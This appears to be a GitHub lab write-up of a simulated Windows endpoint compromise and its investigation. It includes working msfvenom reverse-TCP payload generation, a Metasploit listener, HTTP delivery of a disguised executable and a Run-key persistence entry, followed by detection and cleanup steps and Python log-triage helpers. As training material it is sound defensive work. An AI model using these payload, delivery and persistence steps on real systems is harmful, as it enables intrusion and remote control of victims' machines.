GitHub: effiong-okon/endpoint-malware-investigation
# Malware Compromise & Incident Response on Windows Endpoint
**Lab Type:** Offensive + Defensive Endpoint Security
**Role Simulated:** Red Team (Attacker) → Blue Team (SOC Analyst)
**Environment:** Ubuntu 22.04 VM (Attacker) | Windows 11 VM (Victim) | VirtualBox
**Tools Used:** Metasploit, Meterpreter, Netcat, TCPView, Process Explorer, WMIC, Tasklist, Registry Editor, VirusTotal, PowerShell
## Overview
This lab simulates a real endpoint compromise from both sides of the attack.
**Phase 1 (Red Team):** I generated a reverse TCP payload using msfvenom, named it `not_malware.exe`, and hosted it on a Python HTTP server on the Ubuntu VM. Once it was executed on the Windows machine, a live Meterpreter session opened back on the attacker machine. I then wrote a registry Run key entry named `SystemUpdateHelper` pointing back to `not_malware.exe`, rebooted the Windows VM, and the session reopened automatically without any user interaction. Persistence confirmed.
**Phase 2 (Blue Team):** Switching to the defender role and working only from native Windows tools, I investigated the compromise, starting with `net view`, `netstat -abon` and TCPView to identify the C2 connection, then `tasklist` and WMIC to trace the malicious process and its parent. I went deeper with Process Explorer and VirusTotal. Eradication then took three clean steps: the process was killed with `taskkill`, the Run key entry removed with `reg delete`, and the file wiped with `del`.
**Phase 3 (Extension):** I used a fileless PowerShell reverse shell as an alternative attack vector and detected it through command-line analysis and base64 decoding.
## Environment Setup
| Machine | OS | Role | IP |
|---|---|---|---|
| Ubuntu VM | Ubuntu 22.04 | Attacker / C2 Server | 192.168.100.39 |
| Windows VM | Windows 11 | Victim Endpoint | 192.168.100.42 |
**Requirements:**
- VirtualBox installed on host
- Both VMs set to Bridged Adapter (same physical network interface)
- Windows Defender disabled on Windows VM
- Metasploit Framework installed on Ubuntu
## PHASE 1: OFFENSIVE/ATTACK SIMULATION
### Step 1: Generate the Malware Payload
```bash
mkdir ~/malware && cd ~/malware
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.39 LPORT=4444 -f exe -o not_malware.exe
```

### Step 2: Host and Deliver the Payload
```bash
python3 -m http.server 8000
```
On Windows, I navigated to `http://192.168.100.39:8000` and downloaded `not_malware.exe`.

### Step 3: Start the Metasploit Listener
```
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.39
set LPORT 4444
run
```

### Step 4: Execute the Payload and Establish Access
I double-clicked `not_malware.exe` on the Windows VM. No window, no prompt, nothing visible, but on the Ubuntu machine the Meterpreter session opened instantly.
```
sysinfo
getuid
```
**Compromised machine confirmed:**
- Computer: DESKTOP-GACUCML
- OS: Windows 10 22H2+ (Build 19045)
- Architecture: x64
- User: DESKTOP-GACUCML\Effizy

### Step 5: Deploy Registry Persistence
From the Meterpreter session, I wrote a registry Run key named `SystemUpdateHelper`, designed to blend in as a legitimate system entry, so that `not_malware.exe` would fire automatically every time the machine booted.
Verified from Meterpreter:
```
reg queryval -k HKCU\Software\Microsoft\Windows\CurrentVersion\Run -v SystemUpdateHelper
```

### Step 6: Persistence Survives Reboot
I rebooted the Windows VM and restarted the listener on Ubuntu. The moment I logged in as the user, `not_malware.exe` fired on its own and the session came back up automatically. Persistence confirmed:
```text
[*] Meterpreter session 2 opened (192.168.100.39:4444 -> 192.168.100.42:49702)
```

## PHASE 2: DEFENSIVE/SOC INVESTIGATION
Working entirely from a fresh Windows CMD (Administrator). No prior knowledge assumed.
### Step 1: Checking for Shared Resources
```cmd
net view \\127.0.0.1
net share
net session
```
**Findings:** Only default Windows shares present (C$, IPC$, ADMIN$). No suspicious shares. No active inbound sessions at this point.

### Step 2: Identifying the C2 Connection
```cmd
netstat -abon
netstat -abon | findstr "ESTABLISHED"
```
Running `netstat -abon` and filtering for established connections immediately surfaced the suspicious entry: victim `192.168.100.42:49702` calling out to `192.168.100.39:4444`, state ESTABLISHED, owned by PID 6748, process `not_malware.exe`. That was the C2 connection.
**Malicious connection identified:**
| Field | Value |
|---|---|
| Victim IP:Port | 192.168.100.42:49702 |
| Attacker IP:Port | 192.168.100.39:4444 |
| State | ESTABLISHED |
| PID | 6748 |
| Process | not_malware.exe |
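The triage in Step 2 can be scripted so the owning image is paired with each connection automatically. This is an added example, not part of the original lab: it parses a constructed `netstat -abon` capture (the `[image.exe]` line follows its connection) and flags established connections to uncommon remote ports, which is exactly the pattern the C2 session showed.

```python
"""Parse `netstat -abon` output and flag established connections to uncommon ports."""
import re
from dataclasses import dataclass

# Constructed sample mirroring the lab's capture; not the page's real output.
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       948
  RpcSs
 [svchost.exe]
  TCP    192.168.100.42:49702   192.168.100.39:4444    ESTABLISHED     6748
 [not_malware.exe]
  TCP    192.168.100.42:49710   142.250.74.46:443      ESTABLISHED     5120
 [msedge.exe]
  UDP    0.0.0.0:5353           *:*                                    3100
 [chrome.exe]
"""

CONN = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\w+)\s+)?(\d+)\s*$")
OWNER = re.compile(r"^\s*\[(.+)\]\s*$")   # "[image.exe]" line printed by -b
COMMON_PORTS = {53, 80, 135, 139, 443, 445, 3389}


@dataclass
class Conn:
    proto: str
    local: str
    remote: str
    state: str
    pid: int
    image: str = "?"


def parse_netstat(text: str) -> list[Conn]:
    conns: list[Conn] = []
    for line in text.splitlines():
        m = CONN.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            conns.append(Conn(proto, local, remote, state or "", int(pid)))
        elif conns and (o := OWNER.match(line)):
            conns[-1].image = o.group(1)   # attach owning image to last connection
    return conns


def suspicious(conns: list[Conn]) -> list[Conn]:
    """Established TCP sessions to remote ports outside the common set."""
    hits = []
    for c in conns:
        if c.state != "ESTABLISHED":
            continue
        port = int(c.remote.rsplit(":", 1)[1])
        if port not in COMMON_PORTS:
            hits.append(c)
    return hits
```

Feed it the saved text of `netstat -abon > netstat.txt`; every hit still needs the `tasklist`/WMIC follow-up from the next steps before it is called malicious.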

### Step 3: Visualising with TCPView
TCPView made it obvious: `not_malware.exe` sitting there with an ESTABLISHED connection to `192.168.100.39:4444`, PID 6748, and a create time of `5/28/2026 7:49:51 AM`.

### Step 4: Process Analysis with Tasklist
```cmd
tasklist /FI "PID eq 6748" /V
tasklist /FI "PID eq 5352" /M
```

**Process findings:**
| Field | Value |
|---|---|
| Image Name | not_malware.exe |
| PID | 6748 |
| Memory | 8,032 K |
| Status | Unknown |
| Username | DESKTOP-GACUCML\Effizy |
| Window Title | N/A |
Querying PID 6748 with `tasklist /V` confirmed `not_malware.exe` running under `DESKTOP-GACUCML\Effizy`, consuming 8,032 K of memory with a window title of N/A, i.e. no visible window.
The `/M` flag on PID 5352 listed the loaded DLLs: `ntdll.dll`, `wow64.dll`, `wow64win.dll` and `wow64cpu.dll`, all legitimate Windows libraries, nothing exotic injected.
### Step 5: Deep Analysis with WMIC
```cmd
wmic process where processid=1032 get name, parentprocessid, processid, commandline
wmic process where processid=4648 get name, parentprocessid, processid
```

**Key findings:**
| Field | Value |
|---|---|
| Name | not_malware.exe |
| ProcessId | 1032 |
| ParentProcessId | 4648 |
| CommandLine | C:\Users\Effizy\Downloads\not_malware.exe |
**Parent process confirmed:** explorer.exe (PID 4648, parent 4604)
This means the victim double-clicked the file in Windows Explorer: classic user-executed malware delivery.
### Step 6: Process Explorer Analysis
Process Explorer (Sysinternals) provides visual confirmation and integrates VirusTotal.
- Process tree shows not_malware.exe under explorer.exe
- Image tab: path, start time, auto start location (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdateHelper)
- TCP/IP tab: connection to 192.168.100.39:4444 ESTABLISHED
- Strings tab: embedded text including "This program cannot be run in DOS mode" and network-related strings
**VirusTotal result:** 46 / 71 vendors flagged as malicious Trojan / Backdoor
### Step 7: Manual Hash and VirusTotal Check
**SHA256:** `0ED6444D000E46C540BE327D45609AA163E5D0C6E0E0B6E3F5510D903AFD0CA8`
VirusTotal: 46/71 detections. Popular threat label: **Trojan.Metasploit**. Tags: trojan, backdoor, metasploit.
### Step 8: Registry Persistence Investigation
```cmd
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
```

**Suspicious entry found:**
```text
SystemUpdateHelper REG_SZ C:\Users\Effizy\Downloads\not_malware.exe
```
This entry was not in the baseline. It is not a legitimate Windows or application entry. It points directly to the malware file.
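The two tests applied by eye in Step 8, "not in the baseline" and "points at a file in a user-writable folder", can be run over saved `reg query` output. This is an added example, not part of the original lab; the current and baseline Run key contents are constructed, and the OneDrive entry shows why the path heuristic alone is not enough (legitimate software also runs from AppData, so the baseline diff is the stronger signal).

```python
"""Diff Run-key entries from `reg query` against a known-good baseline."""
import re

# Constructed `reg query HKCU\...\Run` output; not the page's real capture.
CURRENT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Effizy\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SystemUpdateHelper    REG_SZ    C:\Users\Effizy\Downloads\not_malware.exe
"""
# Constructed baseline, as saved from the same key on a clean image.
BASELINE = {
    "OneDrive": r'"C:\Users\Effizy\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

ENTRY = re.compile(r"^\s{2,}(\S+)\s+(REG_\w+)\s+(.*\S)\s*$")   # name  type  data
RISKY_DIRS = ("\\downloads\\", "\\temp\\", "\\public\\", "\\programdata\\")


def parse_run_keys(text: str) -> dict[str, str]:
    """Map value name -> data for every indented entry line."""
    return {m.group(1): m.group(3) for line in text.splitlines() if (m := ENTRY.match(line))}


def launch_path(value: str) -> str:
    """First token of the data (quoted or bare) is the image; the rest is arguments."""
    m = re.match(r'^"([^"]+)"|^(\S+)', value)
    return (m.group(1) or m.group(2)) if m else value


def triage(current: dict[str, str], baseline: dict[str, str]) -> list[tuple[str, str, list[str]]]:
    findings = []
    for name, value in current.items():
        reasons = []
        if name not in baseline:
            reasons.append("not in baseline")
        elif baseline[name] != value:
            reasons.append("changed since baseline")
        if any(d in launch_path(value).lower() for d in RISKY_DIRS):
            reasons.append("launches from user-writable folder")
        if reasons:
            findings.append((name, launch_path(value), reasons))
    return findings
```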
### Step 9: Eradication
**Kill the process:**
```cmd
taskkill /PID 2772 /F
tasklist /FI "PID eq 2772"
```
Result: No tasks running, process confirmed dead.
**Remove persistence:**
```cmd
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemUpdateHelper /f
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
```
Result: SystemUpdateHelper no longer listed.
**Delete the file:**

Result: not_malware.exe no longer present.
### Step 10: Final Verification
```cmd
netstat -abon | findstr "4444"
```
**Result:** No output. The C2 connection is gone. The machine is clean.
## PHASE 3: POWERSHELL REVERSE SHELL (FILELESS VARIANT)
To contrast with the exe-based attack in Phase 1, I demonstrated a fileless technique, a base64-encoded PowerShell reverse shell executed entirely in memory. No file written to disk, no executable to scan or delete.
**Listener on Ubuntu:**
```bash
nc -lvp 4545
```
**Detection on Windows:**
```cmd
netstat -abon
```
`powershell.exe` showed an ESTABLISHED connection to `192.168.100.39:4545` (PID 6732).
**WMIC commandline extraction:**
```cmd
wmic process where processid=6732 get name,parentprocessid,processid,commandline
```
The commandline shows a long Base64-encoded PowerShell string.
**Decoded on Ubuntu:**
```bash
echo "BASE64_STRING" | base64 -d
```
The decoded output reveals the attacker IP (192.168.100.39) and port (4545) hardcoded in the script.
## IOC Summary
| Indicator | Type | Value |
|---|---|---|
| not_malware.exe | File | C:\Users\Effizy\Downloads\not_malware.exe |
| SHA256 | Hash | 0ED6444D000E46C540BE327D45609AA163E5D0C6E0E0B6E3F5510D903AFD0CA8 |
| C2 Server | IP | 192.168.100.39 |
| C2 Port | Port | 4444 |
| Persistence Key | Registry | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdateHelper |
| PowerShell Port | Port | 4545 |
| VirusTotal | Detection | 46/71: Trojan.Metasploit |
## MITRE ATT&CK Mapping
| Technique ID | Name |
|---|---|
| T1059.001 | Command and Scripting Interpreter: PowerShell |
| T1071.001 | Application Layer Protocol: Web Protocols (HTTP delivery) |
| T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys |
| T1049 | System Network Connections Discovery (netstat) |
| T1057 | Process Discovery (tasklist, WMIC) |
| T1012 | Query Registry |
| T1112 | Modify Registry |
| T1070.004 | Indicator Removal: File Deletion |
## Tools Used
| Tool | Type | Purpose |
|---|---|---|
| Metasploit/msfvenom | Offensive | Payload generation and C2 |
| Python HTTP Server | Offensive | Malware delivery |
| Netcat | Offensive | PowerShell shell listener |
| netstat | Native Windows | Network connection analysis |
| net view/share/session | Native Windows | Shared resource enumeration |
| tasklist | Native Windows | Process listing and DLL analysis |
| WMIC | Native Windows | Deep process and commandline analysis |
| TCPView | Sysinternals | Visual network connection analysis |
| Process Explorer | Sysinternals | Process tree and VirusTotal integration |
| Registry Editor / reg | Native Windows | Persistence investigation |
| PowerShell Get-FileHash | Native Windows | File hashing for threat intelligence |
| VirusTotal | Threat Intel | File and IP reputation |
## Key Takeaways
- Every malware infection leaves traces across four areas: processes, network, files, and registry. Checking all four is non-negotiable.
- netstat must be run while the malware is active; it shows live connections, not a log.
- Parent process relationships reveal how malware was launched and help reconstruct the attack chain.
- Registry Run keys are one of the most common persistence mechanisms and are easy to detect with a one-line query.
- A PowerShell encoded command looks like gibberish but decodes in seconds and reveals everything.
- Eradication requires three steps: kill the process, remove the persistence entry, and delete the file. Missing any one of them leaves the machine vulnerable.
*Analyst: Effiong Okon*
*linkedin.com/in/okon-effiong/ | github.com/effiong-okon*